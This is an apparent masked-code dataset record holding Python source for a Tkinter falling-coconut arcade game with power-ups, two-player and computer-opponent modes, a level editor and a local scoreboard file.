data.r):\n data.Invincible2 = True\n data.start2 = data.player2Y\n data.invincible.remove(powerUp)\n\n\nclass ScaryBug(object):\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.speed = 25\n\n def draw(self, canvas, data):\n canvas.create_image(self.x, self.y, image=data.spider)\n\n def onTimerFired(self, data):\n if data.mode == '2Player' or data.mode == 'AI':\n self.speed = 35\n self.y -= self.speed\n if (data.mode == '1Player' or data.mode == 'levelCreated' and data.\n time % 8 == 0):\n side = random.choice(data.sides)\n if side == 'l':\n if self.x - data.lane >= data.Player1Min:\n self.x -= data.lane\n else:\n self.x += data.lane\n elif side == 'r':\n if self.x + data.lane <= data.Player1Max:\n self.x += data.lane\n else:\n self.x -= data.lane\n\n\n<mask token>\n\n\ndef drawPowerups(canvas, data):\n for bug in data.scaryBug:\n bug.draw(canvas, data)\n for powerUp in data.powerUps:\n powerUp.draw(canvas, data)\n for powerUp in data.invincible:\n powerUp.draw(canvas, data)\n\n\ndef drawHome(canvas, data):\n canvas.create_image(data.homeX, data.homeY, image=data.home)\n\n\n<mask token>\n\n\ndef powerUpCoconutShot(data):\n if data.time % 60 == 0 and data.time % 120 != 0:\n Position = random.choice(data.spotList)\n data.powerUps.append(PowerUps(Position, 0))\n if data.time % 50 == 0:\n Position = random.choice(data.spotList)\n data.invincible.append(Invincible(Position, 0))\n if data.time % 100 == 0:\n Position = random.choice(data.spotList)\n data.scaryBug.append(ScaryBug(Position, 750))\n\n\n<mask token>\n\n\ndef madeIt(canvas, data):\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 70, text='You Made it!', font=\n 'Arial 23 bold', fill='yellow')\n canvas.create_text(data.width / 2, 100, text='Score: %d' % data.score,\n font='Arial 15 bold', fill='yellow')\n 
canvas.create_text(data.width / 2, 375, text=\n 'Congrats! Enter your Name!', font='Arial 15 bold', fill='yellow')\n canvas.create_rectangle(data.width / 2 - 50, 400, data.width / 2 + 50, \n 450, fill='white')\n canvas.create_text(data.width / 2, 425, text=data.name)\n\n\ndef drop2Player(data):\n if data.winner == None and data.pauseDrops == False:\n if data.time % 15 == 0:\n xPosition1 = random.randint(0, 385)\n if abs(xPosition1 - 100) > 25 and abs(xPosition1 - 360) > 25:\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(xPosition1, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(xPosition1 + 410, 0))\n if data.time % 12 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(140, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(344, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(755, 0))\n powerupDrop2Player(data)\n\n\ndef powerupDrop2Player(data):\n if data.time % 45 == 0 and data.time % 90 != 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.powerUps.append(PowerUps(140, 0))\n if data.pause2Drop != True:\n data.powerUps.append(PowerUps(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.powerUps.append(PowerUps(344, 0))\n if data.pause2Drop != True:\n data.powerUps.append(PowerUps(755, 0))\n if data.time % 60 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(140, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(344, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(755, 0))\n if data.time % 90 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n 
data.scaryBug.append(ScaryBug(140, 750))\n data.scaryBug.append(ScaryBug(540, 750))\n elif side == 'r':\n data.scaryBug.append(ScaryBug(344, 750))\n data.scaryBug.append(ScaryBug(755, 750))\n\n\n<mask token>\n\n\ndef twoPlayerMousePressed(event, data):\n checkHome(event, data)\n\n\ndef twoPlayerTimerFired(data):\n if data.winner == None:\n data.player1Y -= data.speed\n if data.player1Y < 15 and data.player2Y > 15:\n data.winner = 'player1'\n if data.player1Y > 40:\n data.time += 1\n drop2Player(data)\n data.player2Y -= data.speed\n if data.player2Y < 15 and data.player1Y > 15:\n data.winner = 'player2'\n if data.player2Y > 40:\n data.time += 1\n drop2Player(data)\n if data.player1Y < 15 and data.player2Y < 15:\n data.winner = 'tie'\n for powerUp in data.powerUps:\n powerUp.onTimerFired(data)\n hitPause(data)\n for powerUp in data.invincible:\n powerUp.onTimerFired(data)\n hitInvincible(data)\n for bug in data.scaryBug:\n bug.onTimerFired(data)\n hitScaryBug(data)\n powerupTimerFired(data)\n\n\n<mask token>\n\n\ndef winner(canvas, data):\n if data.winner == 'player1':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! Player 1', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'player2':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! 
Player 2', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'tie':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'Tie! You Both Made it!', font='Arial 23 bold', fill='yellow')\n\n\ndef editorKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n\n\ndef editorMousePressed(event, data):\n checkHome(event, data)\n if data.easyY - data.r <= event.y <= data.easyY + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.yourSpeed = 'slow'\n data.slow = data.click\n data.medium, data.fast = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.yourSpeed = 'medium'\n data.medium = data.click\n data.slow, data.fast = data.notClick, data.notClick\n if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.yourSpeed = 'fast'\n data.fast = data.click\n data.slow, data.medium = data.notClick, data.notClick\n checkMiddle(event, data)\n checkLast(event, data)\n\n\ndef checkMiddle(event, data):\n if data.medX - data.r <= event.y <= data.medX + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.rainSpeed = 'drizzle'\n data.drizzle = data.click\n data.rain, data.thunderstorm = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.rainSpeed = 'rain'\n data.rain = data.click\n data.drizzle, data.thunderstorm = data.notClick, data.notClick\n if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.rainSpeed = 'thunderstorm'\n data.thunderstorm = data.click\n data.drizzle, data.rain = data.notClick, data.notClick\n\n\n<mask token>\n\n\ndef changeEnter(canvas, data):\n if (data.powerUpsEditor != None and data.yourSpeed != None and data.\n rainSpeed != None):\n data.enter = 
data.click\n canvas.create_image(data.medX, data.enterX, image=data.enter)\n canvas.create_text(data.medX, data.enterX, text='Enter', font=data.font)\n\n\ndef editorTimerFired(data):\n data.editorTime += 1\n if data.editorTime % 2 == 0:\n rainDrop(data)\n for drop in data.editorDrops:\n drop.onTimerFired(data)\n\n\ndef rainDrop(data):\n xPosition = random.randint(0, data.width)\n data.editorDrops.append(Coconuts(xPosition, 0))\n\n\n<mask token>\n\n\ndef setEverything(data):\n if data.yourSpeed == 'slow':\n data.speed = 6\n elif data.yourSpeed == 'medium':\n data.speed = 10\n elif data.yourSpeed == 'fast':\n data.speed = 14\n if data.rainSpeed == 'thunderstorm':\n data.rSpeed = 7\n elif data.rainSpeed == 'rain':\n data.rSpeed = 10\n elif data.rainSpeed == 'drizzle':\n data.rSpeed = 13\n\n\n<mask token>\n\n\ndef levelPowerUp(data):\n if data.powerUpsEditor == True:\n if data.time % 20 == 0 and data.time % 40 != 0:\n Position = random.choice(data.spotList)\n data.powerUps.append(PowerUps(Position, 0))\n if data.time % 30 == 0:\n Position = random.choice(data.spotList)\n data.invincible.append(Invincible(Position, 0))\n if data.time % 35 == 0:\n Position = random.choice(data.spotList)\n data.scaryBug.append(ScaryBug(Position, 750))\n\n\n<mask token>\n\n\ndef levelCreatedMousePressed(event, data):\n checkHome(event, data)\n\n\ndef levelCreatedTimerFired(data):\n setEverything(data)\n if data.levelEditorLives > 0:\n data.cy -= data.speed\n if data.cy < 15:\n data.level += 1\n if data.cy > 40:\n data.time += 1\n if data.pauseDrops != True:\n levelCoconutShot(data)\n if data.powerUpsEditor == False:\n for coconut in data.coconuts:\n coconut.onTimerFired(data)\n hit(data)\n if data.powerUpsEditor == True:\n for powerUp in data.powerUps:\n powerUp.onTimerFired(data)\n hitPause(data)\n for powerUp in data.invincible:\n powerUp.onTimerFired(data)\n hitInvincible(data)\n for bug in data.scaryBug:\n bug.onTimerFired(data)\n hitScaryBug(data)\n for coconut in data.coconuts:\n if 
data.pauseDrops == False:\n coconut.onTimerFired(data)\n if data.beInvincible == False:\n hit(data)\n if data.start != None:\n if abs(data.start - data.cy) >= 120:\n data.pauseDrops, data.beInvincible = False, False\n\n\n<mask token>\n\n\ndef winEditor(canvas, data):\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text='You Made it!', font=\n 'Arial 23 bold', fill='yellow')\n\n\n<mask token>\n\n\ndef difficultyMousePressed(event, data):\n checkHome(event, data)\n if data.easyY - data.r <= event.y <= data.easyY + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.difficulty = data.difS\n data.slow = data.click\n data.medium, data.fast = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.difficulty = data.difM\n data.medium = data.click\n data.slow, data.fast = data.notClick, data.notClick\n if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.difficulty = data.difH\n data.fast = data.click\n data.slow, data.medium = data.notClick, data.notClick\n if data.enter == data.click:\n if data.enterY - data.r <= event.y <= data.enterY + data.r:\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.mode = 'AI'\n\n\ndef difficultyTimerFired(data):\n data.editorTime += 1\n if data.editorTime % 2 == 0:\n rainDrop(data)\n for drop in data.editorDrops:\n drop.onTimerFired(data)\n\n\ndef rainDrop(data):\n xPosition = random.randint(0, data.width)\n data.editorDrops.append(Coconuts(xPosition, 0))\n\n\ndef difficultyRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_image(data.width / 2, data.height / 2, image=data.tbg)\n for drop in data.editorDrops:\n drop.draw(canvas)\n drawDifficulties(canvas, data)\n 
drawHome(canvas, data)\n\n\ndef hitAI1(data, distance):\n for coconut in data.coconutsAI1:\n if (data.player1Y - data.r - coconut.y <= distance and data.\n switchOnProgress == False):\n if (coconut.x >= data.player1X - data.r and coconut.x <= data.\n player1X + data.r or AISwitchBug(data, distance) == True):\n testInt = random.randint(0, 9)\n if testInt <= data.difficulty:\n data.switchOnProgress = True\n if data.player1X == 150:\n data.player1X = 340\n else:\n data.player1X = 150\n data.switchOnProgress = False\n if (coconut.y >= data.player1Y - data.r and coconut.y <= data.\n player1Y + data.r):\n if (coconut.x >= data.player1X - data.r and coconut.x <= data.\n player1X + data.r):\n data.player1Y += 50\n data.coconutsAI1.remove(coconut)\n\n\n<mask token>\n\n\ndef hitAI2(data, distance):\n for coconut in data.coconutsAI2:\n if (coconut.y >= data.player2Y - data.r and coconut.y <= data.\n player2Y + data.r):\n if (coconut.x >= data.player2X - data.r and coconut.x <= data.\n player2X + data.r):\n data.player2Y += 50\n data.coconutsAI2.remove(coconut)\n\n\ndef coconutShotAI(data):\n if data.winner == None:\n if data.time % 15 == 0:\n xPosition1 = random.randint(0, 385)\n if abs(xPosition1 - 100) > 40 and abs(xPosition1 - 360) > 40:\n if data.pause1Drop != True:\n data.coconutsAI1.append(Coconuts(xPosition1, 0))\n if data.pause2Drop != True:\n data.coconutsAI2.append(Coconuts(xPosition1 + 410, 0))\n if data.time % 8 == 0:\n xPosition2 = random.randint(0, 80)\n xPosition3 = random.randint(364, 385)\n if data.pause1Drop != True:\n data.coconutsAI1.append(Coconuts(xPosition2, 0))\n data.coconutsAI1.append(Coconuts(xPosition3, 0))\n if data.pause2Drop != True:\n data.coconutsAI2.append(Coconuts(xPosition2 + 410, 0))\n data.coconutsAI2.append(Coconuts(xPosition3 + 410, 0))\n addExtraCoconut(data)\n addPowerUpsAI(data)\n\n\n<mask token>\n\n\ndef addPowerUpsAI(data):\n if data.time % 33 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != 
True:\n data.invincible.append(Invincible(140, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(550, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(344, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(755, 0))\n if data.time % 66 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n data.scaryBug.append(ScaryBug(140, 750))\n data.scaryBug.append(ScaryBug(550, 750))\n elif side == 'r':\n data.scaryBug.append(ScaryBug(344, 750))\n data.scaryBug.append(ScaryBug(750, 750))\n\n\n<mask token>\n\n\ndef AITimerFired(data):\n if data.winner == None:\n if data.Invincible1 == False:\n hitAI1(data, 31)\n if data.Invincible2 == True:\n pass\n elif data.Invincible2 == False:\n hitAI2(data, 31)\n for coconut in data.coconutsAI1:\n if data.pause1Drop == False:\n coconut.onTimerFired(data)\n for coconut in data.coconutsAI2:\n if data.pause2Drop == False:\n coconut.onTimerFired(data)\n if data.Invincible1 == False:\n hitAI1(data, 13)\n if data.Invincible2 == True:\n pass\n elif data.Invincible2 == False:\n hitAI2(data, 13)\n data.player1Y -= data.speedAI\n if data.player1Y < 15 and data.player2Y > 15:\n data.winner = 'player1'\n if data.player1Y > 40:\n data.time += 1\n coconutShotAI(data)\n data.player2Y -= data.speedAI\n if data.player2Y < 15 and data.player1Y > 15:\n data.winner = 'player2'\n if data.player2Y > 40:\n data.time += 1\n coconutShotAI(data)\n if data.player1Y < 15 and data.player2Y < 15:\n data.winner = 'tie'\n for powerUp in data.powerUps:\n powerUp.onTimerFired(data)\n hitPause(data)\n powerUpAITimerFired(data)\n\n\n<mask token>\n\n\ndef AIWinner(canvas, data):\n if data.winner == 'player1':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text='The Computer Won :(',\n font='Arial 
23 bold', fill='yellow')\n elif data.winner == 'player2':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! You Won!', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'tie':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'Tie! You Both Made it!', font='Arial 23 bold', fill='yellow')\n\n\ndef scoreboardKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n\n\ndef scoreboardMousePressed(event, data):\n checkHome(event, data)\n\n\ndef scoreboardTimerFired(data):\n difficultyTimerFired(data)\n\n\ndef scoreboardRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_image(data.width / 2, data.tbgY, image=data.tbg)\n for drop in data.editorDrops:\n drop.draw(canvas)\n canvas.create_text(data.width / 2, data.txtTScore, text='Top Scores!',\n font='Arial 30 bold', fill='yellow')\n canvas.create_text(data.width / 2, data.S_P, text='Score_Player', font=\n 'Arial 20 bold', fill='yellow')\n drawHome(canvas, data)\n data.savedScores\n data.savedScores = readFile('score.txt')\n score = data.savedScores.splitlines()\n scores = []\n for line in score:\n scores.append(line.split(','))\n scores = sorted(scores, key=lambda x: int(x[0]))\n top5 = scores[-data.numScores:]\n top5.reverse()\n for i in range(len(top5)):\n canvas.create_text(data.width / 2, data.scoreShift + i * 50, text=\n top5[i], font='Arial 18 bold', fill='yellow')\n\n\n<mask token>\n\n\ndef helpRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.helpY, image=data.helpScreen)\n for drop in 
data.editorDrops:\n drop.draw(canvas)\n drawHome(canvas, data)\n\n\ndef run(width=15000, height=25000):\n\n def redrawAllWrapper(canvas, data):\n canvas.delete(ALL)\n redrawAll(canvas, data)\n canvas.update()\n\n def mousePressedWrapper(event, canvas, data):\n mousePressed(event, data)\n redrawAllWrapper(canvas, data)\n\n def keyPressedWrapper(event, canvas, data):\n keyPressed(event, data)\n redrawAllWrapper(canvas, data)\n\n def timerFiredWrapper(canvas, data):\n timerFired(data)\n redrawAllWrapper(canvas, data)\n canvas.after(data.timerDelay, timerFiredWrapper, canvas, data)\n\n\n class Struct(object):\n pass\n data = Struct()\n data.width = width\n data.height = height\n data.timerDelay = 100\n root = Tk()\n init(data)\n canvas = Canvas(root, width=data.width, height=data.height)\n canvas.pack()\n root.bind('<Button-1>', lambda event: mousePressedWrapper(event, canvas,\n data))\n root.bind('<Key>', lambda event: keyPressedWrapper(event, canvas, data))\n timerFiredWrapper(canvas, data)\n root.mainloop()\n print('bye!')\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef init2(data):\n data.tbg = PhotoImage(file='tbg2.gif')\n data.click = PhotoImage(file='click.gif')\n data.notClick = PhotoImage(file='notClick.gif')\n data.player1X = 150\n data.player1Y = 750\n data.player2X = 550\n data.player2Y = 750\n data.winner = None\n data.speed = 12\n data.speed2 = 12\n data.editorTime = 0\n data.editorDrops = []\n data.margin = 100\n data.enter = False\n data.powerUpsEditor = None\n data.yourSpeed = None\n data.rainSpeed = None\n data.slow = data.notClick\n data.medium = data.notClick\n data.fast = data.notClick\n data.drizzle = data.notClick\n data.rain = data.notClick\n data.thunderstorm = data.notClick\n init3(data)\n\n\ndef init3(data):\n data.yes = data.notClick\n data.no = data.notClick\n data.enter = data.notClick\n data.levelEditorLives = 2\n data.rSpeed = None\n data.start = None\n data.start1 = None\n data.start2 = None\n data.difficulty = None\n data.mode1 
= data.notClick\n data.mode2 = data.notClick\n data.mode3 = data.notClick\n data.mode4 = data.notClick\n data.mode5 = data.notClick\n data.mode6 = data.notClick\n data.home = PhotoImage(file='home.gif')\n data.helpScreen = PhotoImage(file='help1.gif')\n data.title = PhotoImage(file='title.gif')\n data.scoreList = []\n data.spotList = [270, 364, 458, 552, 646, 740]\n data.savedScores = readFile('score.txt')\n if data.mode == 'levelCreated':\n setEverything(data)\n initsplashScreenNumbers(data)\n\n\ndef initsplashScreenNumbers(data):\n data.splashButtonY = 425\n data.p1ButtonX = 225\n data.p2ButtonX = 290\n data.edButton = 355\n data.diffButton = 425\n data.helpButton = 490\n data.sboardButton = 555\n data.hitPenalty = 75\n data.splashText = data.height / 2 - 20\n data.lives = 2\n data.levelMax = 8\n data.lane = 94\n data.Player1Min = 270\n data.Player1Max = 740\n data.homeX = 50\n data.homeY = 650\n initScoreBoardHelp(data)\n init1Player(data)\n\n\n<mask token>\n\n\ndef init1Player(data):\n data.buffer = 40\n\n\ndef initAI(data):\n data.AITY = 225\n data.easyX = 200\n data.easyY = 300\n data.medX = 400\n data.hardX = 600\n data.enterY = 450\n data.difS = 4\n data.difM = 6\n data.difH = 8\n data.last = 500\n data.enterX = 575\n data.PUT = 450\n data.RST = 350\n data.YST = 250\n\n\ndef mousePressed(event, data):\n if data.mode == 'splashScreen':\n splashScreenMousePressed(event, data)\n elif data.mode == '1Player':\n playerMousePressed(event, data)\n elif data.mode == '2Player':\n twoPlayerMousePressed(event, data)\n elif data.mode == 'editor':\n editorMousePressed(event, data)\n elif data.mode == 'levelCreated':\n levelCreatedMousePressed(event, data)\n elif data.mode == 'AI':\n AIMousePressed(event, data)\n elif data.mode == 'difficulty':\n difficultyMousePressed(event, data)\n elif data.mode == 'scoreboard':\n scoreboardMousePressed(event, data)\n elif data.mode == 'help':\n helpMousePressed(event, data)\n\n\n<mask token>\n\n\ndef timerFired(data):\n if data.mode 
== 'splashScreen':\n splashScreenTimerFired(data)\n elif data.mode == '1Player':\n playerTimerFired(data)\n elif data.mode == '2Player':\n twoPlayerTimerFired(data)\n elif data.mode == 'editor':\n editorTimerFired(data)\n elif data.mode == 'levelCreated':\n levelCreatedTimerFired(data)\n elif data.mode == 'AI':\n AITimerFired(data)\n elif data.mode == 'difficulty':\n difficultyTimerFired(data)\n elif data.mode == 'scoreboard':\n scoreboardTimerFired(data)\n elif data.mode == 'help':\n helpTimerFired(data)\n\n\ndef redrawAll(canvas, data):\n if data.mode == 'splashScreen':\n splashScreenRedrawAll(canvas, data)\n elif data.mode == '1Player':\n playerRedrawAll(canvas, data)\n elif data.mode == '2Player':\n twoPlayerRedrawAll(canvas, data)\n elif data.mode == 'editor':\n editorRedrawAll(canvas, data)\n elif data.mode == 'levelCreated':\n levelCreatedRedrawAll(canvas, data)\n elif data.mode == 'AI':\n AIRedrawAll(canvas, data)\n elif data.mode == 'difficulty':\n difficultyRedrawAll(canvas, data)\n elif data.mode == 'scoreboard':\n scoreboardRedrawAll(canvas, data)\n elif data.mode == 'help':\n helpRedrawAll(canvas, data)\n\n\n<mask token>\n\n\ndef splashKeyPressed(event, data):\n pass\n\n\ndef splashScreenTimerFired(data):\n data.splashScreenTime += 1\n if data.splashScreenTime % 2 == 1:\n rainDropSplash(data)\n for drop in data.splashScreenDrops:\n drop.onTimerFired(data)\n\n\ndef splashScreenButtons(canvas, data):\n canvas.create_image(data.splashButtonY, data.p1ButtonX, image=data.mode1)\n canvas.create_image(data.splashButtonY, data.p2ButtonX, image=data.mode2)\n canvas.create_image(data.splashButtonY, data.edButton, image=data.mode3)\n canvas.create_image(data.splashButtonY, data.diffButton, image=data.mode4)\n canvas.create_image(data.splashButtonY, data.helpButton, image=data.mode5)\n canvas.create_image(data.splashButtonY, data.sboardButton, image=data.mode6\n )\n\n\ndef rainDropSplash(data):\n xPosition = random.randint(0, 800)\n 
data.splashScreenDrops.append(Coconuts(xPosition, 0))\n\n\ndef splashScreenRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.splashText - 10, image=data.title)\n for drop in data.splashScreenDrops:\n drop.draw(canvas)\n canvas.create_text(data.width / 2, data.splashText, text=\n \"\"\"\n 1.) Single Player Level Mode\n\n\n 2.) Two-Player Mode\n\n \n 3.) Level Creator Practice Mode\n\n \n 4.) Play Against the Computer\n\n \n 5.) Help and Instructions\n\n \n 6.) Scoreboard\n\n \n \"\"\"\n , font='Arial 14 bold', fill='yellow')\n splashScreenButtons(canvas, data)\n\n\ndef writeFile(path, contents):\n with open(path, 'wt') as f:\n f.write(contents)\n\n\ndef readFile(path):\n with open(path, 'rt') as f:\n return f.read()\n\n\nclass Coconuts(object):\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.r = 9\n self.fill = 'deep sky blue'\n self.speed = 30\n self.outline = 'blue'\n\n def draw(self, canvas):\n canvas.create_polygon(self.x, self.y - 2 * self.r, self.x - self.r,\n self.y, self.x, self.y + self.r, self.x + self.r, self.y, fill=\n self.fill, outline=self.outline, width=3)\n\n def onTimerFired(self, data):\n self.y += self.speed\n\n\ndef hit(data):\n for coconut in data.coconuts:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if coconut.y >= data.cy - data.r and coconut.y <= data.cy + data.r:\n if (coconut.x >= data.cx - data.r and coconut.x <= data.cx +\n data.r):\n data.cy += data.hitPenalty\n if data.mode == 'levelCreated':\n data.lives -= 1\n elif data.hit == False and data.level < data.levelMax:\n data.score -= data.level\n data.coconuts.remove(coconut)\n if data.mode == 'levelCreated':\n data.levelEditorLives -= 1\n\n\ndef hit2Player(data):\n if data.mode == '2Player':\n if data.Invincible1 == False:\n for coconut in data.coconuts1:\n if (coconut.y >= data.player1Y - data.r and coconut.y <= \n data.player1Y + data.r):\n if (coconut.x >= data.player1X - data.r and coconut.x <=\n data.player1X + data.r):\n 
data.player1Y += data.hitPenalty\n data.coconuts1.remove(coconut)\n if data.Invincible2 == False:\n for coconut in data.coconuts2:\n if (coconut.y >= data.player2Y - data.r and coconut.y <= \n data.player2Y + data.r):\n if (coconut.x >= data.player2X - data.r and coconut.x <=\n data.player2X + data.r):\n data.player2Y += data.hitPenalty\n data.coconuts2.remove(coconut)\n\n\nclass PowerUps(Coconuts):\n\n def __init__(self, x, y):\n super().__init__(x, y)\n\n def draw(self, canvas, data):\n canvas.create_image(self.x, self.y, image=data.hourGlass)\n\n\ndef hitPause(data):\n for powerUp in data.powerUps:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r:\n if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx +\n data.r):\n data.pauseDrops = True\n data.start = data.cy\n data.powerUps.remove(powerUp)\n elif data.mode == '2Player' or data.mode == 'AI':\n if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data.\n player1Y + data.r):\n if (powerUp.x >= data.player1X - data.r and powerUp.x <= \n data.player1X + data.r):\n data.pause1Drop = True\n data.start1 = data.player1Y\n data.powerUps.remove(powerUp)\n if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data.\n player2Y + data.r):\n if (powerUp.x >= data.player2X - data.r and powerUp.x <= \n data.player2X + data.r):\n data.pause2Drop = True\n data.start2 = data.player2Y\n data.powerUps.remove(powerUp)\n\n\nclass Invincible(PowerUps):\n\n def __init__(self, x, y):\n super().__init__(x, y)\n\n def draw(self, canvas, data):\n canvas.create_image(self.x, self.y, image=data.umbrella)\n\n\ndef hitInvincible(data):\n for powerUp in data.invincible:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r:\n if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx +\n data.r):\n data.beInvincible = True\n data.start = data.cy\n 
data.invincible.remove(powerUp)\n if data.mode == '2Player' or data.mode == 'AI':\n if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data.\n player1Y + data.r):\n if (powerUp.x >= data.player1X - data.r and powerUp.x <= \n data.player1X + data.r):\n data.Invincible1 = True\n data.start1 = data.player1Y\n data.invincible.remove(powerUp)\n if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data.\n player2Y + data.r):\n if (powerUp.x >= data.player2X - data.r and powerUp.x <= \n data.player2X + data.r):\n data.Invincible2 = True\n data.start2 = data.player2Y\n data.invincible.remove(powerUp)\n\n\nclass ScaryBug(object):\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.speed = 25\n\n def draw(self, canvas, data):\n canvas.create_image(self.x, self.y, image=data.spider)\n\n def onTimerFired(self, data):\n if data.mode == '2Player' or data.mode == 'AI':\n self.speed = 35\n self.y -= self.speed\n if (data.mode == '1Player' or data.mode == 'levelCreated' and data.\n time % 8 == 0):\n side = random.choice(data.sides)\n if side == 'l':\n if self.x - data.lane >= data.Player1Min:\n self.x -= data.lane\n else:\n self.x += data.lane\n elif side == 'r':\n if self.x + data.lane <= data.Player1Max:\n self.x += data.lane\n else:\n self.x -= data.lane\n\n\ndef hitScaryBug(data):\n for bug in data.scaryBug:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if (bug.y >= data.cy - 1.5 * data.r and bug.y <= data.cy + 1.5 *\n data.r):\n if (bug.x >= data.cx - 1.5 * data.r and bug.x <= data.cx + \n 1.5 * data.r):\n data.hit = True\n data.lives = 0\n data.levelEditorLives = 0\n if data.mode == '2Player' or data.mode == 'AI':\n if (bug.y >= data.player1Y - data.r and bug.y <= data.player1Y +\n data.r):\n if (bug.x >= data.player1X - data.r and bug.x <= data.\n player1X + data.r):\n data.winner = 'player2'\n if (bug.y >= data.player2Y - data.r and bug.y <= data.player2Y +\n data.r):\n if (bug.x >= data.player2X - data.r and bug.x <= data.\n player2X + 
data.r):\n data.winner = 'player1'\n\n\ndef drawPowerups(canvas, data):\n for bug in data.scaryBug:\n bug.draw(canvas, data)\n for powerUp in data.powerUps:\n powerUp.draw(canvas, data)\n for powerUp in data.invincible:\n powerUp.draw(canvas, data)\n\n\ndef drawHome(canvas, data):\n canvas.create_image(data.homeX, data.homeY, image=data.home)\n\n\n<mask token>\n\n\ndef powerUpCoconutShot(data):\n if data.time % 60 == 0 and data.time % 120 != 0:\n Position = random.choice(data.spotList)\n data.powerUps.append(PowerUps(Position, 0))\n if data.time % 50 == 0:\n Position = random.choice(data.spotList)\n data.invincible.append(Invincible(Position, 0))\n if data.time % 100 == 0:\n Position = random.choice(data.spotList)\n data.scaryBug.append(ScaryBug(Position, 750))\n\n\n<mask token>\n\n\ndef playerRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_line(0, 20, data.width, 20)\n for coconut in data.coconuts:\n 